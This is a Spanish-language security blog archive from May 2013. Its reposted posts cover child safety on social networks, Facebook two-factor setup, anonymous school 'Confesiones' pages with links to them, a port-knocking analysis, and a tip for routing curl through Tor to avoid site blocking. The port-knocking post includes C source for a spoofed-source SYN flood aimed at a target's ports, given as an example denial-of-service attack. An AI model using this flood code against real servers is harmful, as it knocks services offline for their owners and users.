Archive for May 2013

Protejamos a los niños de las Redes Sociales, que son un peligro

Las redes sociales actualmente estan en boom, lo grande de lo grande con la aparición de Facebook, G+, Twitter en alguna de ellas el control ante el uso indebido de la tecnología no es controlado en su totalidad llevando con ello a que existan menores usando estas redes, el motivo de crear esta entrada fue porque esta semana una niña que no pasa de los 10 años dijo que tiene Facebook, su hermana mayor lo creo y tiene 500 amigos, me lo dijo toda orgullosa    al escuchar eso me  puse a pensar una niña de esa edad 500 amigos..

Cuantos son reales? cuantos en realidad son niños, se tiene un control de sus amigos, pues la respuesta es un no, estas redes sociales esta mas que dicho que no debe de ser usada por niños pero todos sabemos pongo 1990 y ya puedo tener cuenta aunque tenga 12 años porque engañar al tío Sam es fácil.

Así que luego de ello me puse a hablar con su mamá y a la vez con la niña fue gratificante que haya entendido los peligro que corre la pequeña al estar en una red social de ese modo, asi que me puse manos a la obra y pensé porque no facilitar una red social exclusivamente para la niña (redes sociales para niños) aunque no se tiene un control general de algunas redes sociales las cuales son específicas por ejemplo solo para chicas como es el caso de Sweetyhigh pero no tienen un control mas a fondo sobre el mismo pudiendo crear una cuenta falsa y hacerse pasar.



Ahora si las redes sociales para niños que le di una mirada son las siguientes:



CLUB PENGUIN -> www.clubpenguin.com/es/
MOSHI MONSTERS -> www.moshimonsters.com/
MI CUEVA -> www.micueva.com/




Cada una tiene un control parental para poder tener un control del circulo de amigos que lleguen a tener los niños , pero también en estas otras redes sociales para niños específicamente se puede dar el caso de adulterar una edad y no validar, por lo cual algunas redes se toman el trabajo de llamar al padre verificar y validar los datos que fueron  se llega, a dar un caso asi puede ser no es totalmente seguro por ello es mejor siempre andar monitoreando a los pequeños.


Algo que debemos de tomar en cuenta es de poder concientizar a los niños, a nuestros hermanos menores primos sobrinos conocidos, que debe de pensar antes de subir una foto, ya sea de ellos o de sus amigos porque cualquier persona puede verlos y que toda informacion que es subida a la nube no se puede eliminar, por mas que se realize la eliminacion de la cuenta no se sabe si andan circulando copias de las mismas

Recuérdeles a sus hijos que la información que publican en línea no se puede eliminar. No 
Aunque elimine la información de un sitio, tendrá muy poco control sobre las antiguas versiones que quedan registradas en las computadoras de otras personas que pueden circularlas en línea.


Pero estos puntos son mayores los cuales iremos tomando mas a fondo y a la vez se creara una entrada con todos estos puntos que se tienen que tener cuidado, cuando los niños acceden a redes sociales y aun mas a un computador.



Sin mas que decir, sniferl4bs regresa!!


Regards,
Snifer


Leer artículo original: Protejamos a los niños de las Redes Sociales, que son un peligro

Paso a paso: ¿Cómo activar la doble autenticación en Facebook?






Para poder activar la doble autenticación que nos proporciona Facebook debemos seguir algunos pasos:

1.- Ir a Configuración de la cuenta 

2.- Seleccionar en las Opciones -> “Seguridad”, nos situamos en “Aprobaciones de inicio de Sesión”, y clickeamos “Editar”.



















3.- Damos check en ” Solicitar Código de seguridad para ingresar a mi cuenta desde navegadores desconocidos” y nos saltara un aviso para seguir.











Comenzaremos una serie de pasos bastante sencillos:

Lo primero es agregar los “navegadores conocidos” empezando por el que estamos utilizando en este momento, y nos solicitará reconocerlo con algún nombre: En mi caso ” mi pc “:





Configuramos los códigos de Seguridad para el móvil eligiendo nuestro equipo: En este ejemplo un “iphone”


Las instrucciones nos explican que debemos ir a nuestra aplicación móvil ( actualizada ) y seleccionar el generador de códigos




















OJO este Paso en el móvil ( iphone ):


Al ingresar a Generador de Códigos se nos genera uno que se actualiza cada 30 segundos y que debemos ingresar aquí y confirmar (en el pc):

Seguido a esto debemos ingresar el numero telefónico del móvil al cual queremos recibir nuestro código para la doble autenticación y confirmar:


Te llegará un código a tu teléfono, generalmente se demora menos de 1 minuto en llegar )y lo ingresamos para confirmar: 



Listo, hemos terminado de activar la doble autenticación en Facebook


Cabe destacar lo siguiente: Facebook solicitará el segundo factor de autenticación solo en los caso que ingresemos de equipos que no hayan sido utilizados anteriormente y no encuentren en nuestra lista de navegadores/equipos conocidos. En este caso el código de verificación será recibido mediante un SMS o puede ser generado a de forma manual por la aplicación móvil en generador de códigos .


Leer artículo original: Paso a paso: ¿Cómo activar la doble autenticación en Facebook?

Regresamos…..

Ya retornamos nuevamente con el blog ya paso un problema personal, el cual salio todo bien, hoy pasare este fin de semana con mi familia para que desde el lunes vuelva al trabajo 🙂 pero antes de ello quiero pasar por el blog y retomarlo es por ello que el dia de hoy, volvemos con los post diarios gracias a todos por el apoyo… 
Hubo un cambio general en la vida, para bien cambiando el rumbo es por ello que deje de postear en el blog, no ando tan activo en los foros como antes y en el twitter solo cuando tengo algo de tiempo twittetereteo algo, pero ya nuevamente tomo el rumbo del blog y andare molestando con mis ideas 🙂

Regards,
SNIFER


Leer artículo original: Regresamos…..

[Confesiones]: La nueva moda de Facebook




De un tiempo a esta parte hemos visto como se ha incrementado el número de paginas en Facebook con el famoso Titulo “Confesiones” seguido de las siglas de alguna universidad o colegio. Esto ha sobrepasado fronteras y se ha hecho bastante famoso replicándose en un sin número de establecimientos educacionales de todo nivel.

¿De que se tratan estas páginas creadas en Facebook?


Confesiones es una página donde se publican Secretos/confesiones/cahuines o simples mentiras enviadas idealmente por estudiantes del mismo centro educacional de manera totalmente “anónima”. Para lograr este “anonimato” utilizan GoogleDocs para crear formularios donde reciben las confesiones sin necesidad de remitentes o algún dato personal como muestra la imagen.






















Todas las confesiones recibidas son publicadas en la página de Facebook creada para cada universidad/colegio, seguida de un pequeño comentario del Admin del sitio. 
Por ejemplo: Confesiones UDD ( Universidad del Desarrollo )





























El contenido de estos sitios es el que les ha dado gran popularidad llegando a conseguir miles de Me gusta en tan poco tiempo. Muchas veces podemos leer historias bastante entretenidas sobre anécdotas universitarias/escolares,confesiones importantes como publicar que enfrentan una enfermedad o depresión o finalmente esencialmente inofensivas y humorísticas.






















¿Peligros con esta nueva Moda?




Claro que sí, resulta que “Confesiones” también está siendo utilizado por inescrupulosos aprovechando la carencia de filtros y el “anonimato” para sembrar por Internet: Mentiras, burlarse de alumnos e incluso dejando en evidencia la fijación que tienen ciertos personajes “desconocidos” por algunas alumnas.



Es una pena que personas al ver que pueden contar una historia ( verdadero o Totalmente Falsa), desde el total “anonimato” y que garantiza que su confesión será leída por Miles de usuarios de la casa estudiantil, utilicen esta plataforma para:

  • Crear conflictos
  • Inventar relaciones ficticias
  • Burlarse de la imagen de un compañero
  • hablar groseramente de mujeres aludiendo a la sexualidad.
  • aludir favores sexuales con  profesores para pasar ramos
  • Exponer relaciones de personas ajenas a ellos.
  • Acusar directamente a profesores de conductas inadecuadas



En fin, el problema es que del anonimato se pueden decir muchas cosas algunas ciertas y otras no, sin mayor responsabilidad. Pero en un red social esto no puede ocurrir, ya que un mensaje en minutos es visto por miles de personas y se masifica por cada rincón sin responsables de tal afirmación, en donde un comentario puede Destruir la Vida de una persona.  #Bullying


Omitimos publicar este tipo de Confesiones debido a su contenido [Lenguaje Vulgar o sexual]







Colegios y Menores de Edad..


Peor aún es el caso de que “Confesiones” a llegado a colegios, donde menores de edad se ven expuesto a todo este riesgo. Es verdad que para muchos es inofensivo y aveces es como una forma de desahogo para problemas personales o simple morbo. Sin embargo, esta siendo utilizado también para los fines anteriormente nombrados. 

Ejemplo de Confesiones en 
Colegio [Chile  ]:

– Saint George’s College: http://on.fb.me/10Dz1XQ
– Dunalastair: http://on.fb.me/11L6ozt
– La Maisonnette: http://on.fb.me/Z21oEW
– Everest: http://on.fb.me/Z21sVc
– SSCC Manquehue: http://on.fb.me/10a1FnX
– Santiago College: http://on.fb.me/10a1JEn
– Santa Ursula: http://on.fb.me/12hTJPl
– Grange School: http://on.fb.me/16stg8h

– Instituto Nacional: http://on.fb.me/186QBJZ
– Nido De Aguilas: http://on.fb.me/10KHDx1
– Redland School: http://on.fb.me/YPjmIC
– Newland School: http://on.fb.me/10zrWeU
– Villa María Academy: http://on.fb.me/12BbWJu
– Cumbres: http://on.fb.me/10a22yN
– Verbo Divino: http://on.fb.me/10KHMjW
– Alianza Francesa: http://on.fb.me/10zs3qW
– Scuola Italiana VM: http://on.fb.me/19H0b5r
– y más…


¿Qué esta sucediendo en estos sitios?, solo un administrador muchas veces sin sentido común es el filtro entre realidad-Ficción, tranquilidad o Burlas masivas para una persona.




“El acoso por Internet SI tiene Consecuencias en la Vida REAL”








Leer artículo original: [Confesiones]: La nueva moda de Facebook

DEFENSA OFENSIVA POR OSCURIDAD-PORT KNOCKING III.

DoS..knockOUT Fuera de Combate (DoS Knocking Attack)


Recordamos de nuevo ( Sorry, soy un pesado) que la idea central del Port Knocking es que se envía una secuencia de paquetes a un servidor y este  tiene el “efecto” de ajustar las reglas del cortafuegos para permitir la conexión a través de un puerto que el cortafuegos tiene previamente cerrado.

También hemos visto como burlar al Firewall con NAT con este tipo de implementaciones y como ya dije existen muchas voces abogando por un cambio en las estructura del Port Knocking.. 

Como es lógico y para que funcione correctamente, el “Port-Knocking Server” debe intenta controlar la conexión hecha en su contra, por lo que puede buscar patrones de autenticación y los puertos abiertos cuando sea solicitado por los usuarios autorizados. Esto implica que un proceso debe analizar los logs en ​​tiempo real para detectar automáticamente las secuencias.

Si analizamos la forma en que el puerto “golpea” nos damos cuenta que el proceso necesita un “buffer” por cada uno de los clientes que quieren realizar la conexión, por lo que el proceso es capaz de rastrear cada secuencia de autenticación.

Si un atacante logra enviar paquetes falsificados con las direcciones de red de origen aleatorios (de la misma manera algunos gusanos se propagan) el proceso “the parser process”  tendría que crear un “buffer” para cada una de las direcciones, por lo que haciendo que este proceso deba consumir grandes cantidades de memoria.
(Más adelante veremos un ejemplo en código)

Otras dos consideraciones acerca de los ataques de denegación de servicio en “portknocking” es sobre el cifrado de parámetros y el rendimiento del “parser”..se recomienda cifrado de parámetros de manera que se puedan lograr dos principios básicos de seguridad de la información como son  la integridad y la confidencialidad.

Para lograr este cometido de confidencialidad e integridad la recomendación es el uso de “one-time-passwords” para evitar ataques de repetición (reply attacks).







Estado del servidor de “portKnocking” (vmstat) durante el proceso de ataque DoS con un intervalo de tiempo entre las medidas de 5 segundos 

De cualquier manera,se implemente o no criptografía, el análisis de tráfico siempre es posible, dándonos la pista sobre le mecanismo de autenticación utlizado ..

Si un atacante puede recopilar datos de este mecanismo que incluyen varias autenticaciones, este puede darse cuenta de que antes de cualquier conexión a un puerto protegido hay una serie de intentos de conexión contra puertos cerrados (y en función del número de autenticaciones capturados, podría ser posible para identificar los puertos válidos que están siendo utilizados y su oscilación)

Código usado para el Ataque KnockOut (DoS-Knocking) 


Este es el Código fuente para generar un ataque que consiste en el envío de paquetes con direcciones de origen falsas al azar a los puertos “al azar” en el blanco.

#include “forgeit.h”
#define INTERFACE “eth0”
#define INTERFACE_PREFIX 14
char SOURCE[16],DEST[16];
int SOURCE_P,DEST_P;
int main(int argc, char *argv[])
{
int i, quantity, starting_port, range, fd_send;
if(argc != 5) {
printf(“\tusage: %s ip_dst quantity init_port port_qty\n”,
argv[0]);
exit(0);
}
DEV_PREFIX = INTERFACE_PREFIX;
memset(SOURCE,0,16);
memset(DEST,0,16);
srand(time(NULL));
strncpy(DEST,argv[1],15);
quantity = atoi(argv[2]);
starting_port = atoi(argv[3]);
range = atoi(argv[4]);
fd_send = open_sending();
for (i=0;i<quantity;i++)
{
snprintf(SOURCE,15,”%d.%d.%d.%d”
,1+(int)(254.0* rand()(RAND_MAX+1.0))
,1+(int)(254.0*rand() / (RAND_MAX+1.0))
,1+(int)(254.0*rand() / (RAND_MAX+1.0))
,1+(int)(254.0*rand() / (RAND_MAX+1.0)));
SOURCE_P=1024+(int)(60000.0*rand() / (RAND_MAX+1.0));
DEST_P=starting_port+(int)(((float)range)*rand() /
(RAND_MAX+1.0));
transmit_TCP (fd_send, SOURCE, SOURCE_P,DEST, DEST_P,SYN);
}
return 0;
}



(Ejemplo basado en el código de Brecht Claerhout para spoofip  y sniper-rts  modificado únicamente para mejorar el rendimiento de paquetes que envía)

Un saludo

Live Free Or Die Hacking 










Leer artículo original: DEFENSA OFENSIVA POR OSCURIDAD-PORT KNOCKING III.

Usar curl sobre la red TOR

PROBLEMA
Automatizar consultas a sitios web en algunos casos es complicado, ya que algunos sitios nos pueden bloquear, por lo que la solución es agregar un factor humano (delay a las consultas) o consultar desde distintas ips.

PROPUESTA
La red TOR provee varios nodos a modo de proxies, lo que permite que nuestras consultas sean realizadas desde distintas ips.

SOLUCIÓN
Ejecutar en el terminal de linux:
sudo apt-get install -y privoxy tor
sudo echo “forward-socks4a / localhost:9050 .” >> /etc/privoxy/config

sudo /etc/init.d/privoxy start
sudo /etc/init.d/tor start

Con estos sencillos pasos ya podemos conectarnos a una red tor indicando como proxy el puerto 9050 de nuestra máquina local.

DEMO

Leer artículo original: Usar curl sobre la red TOR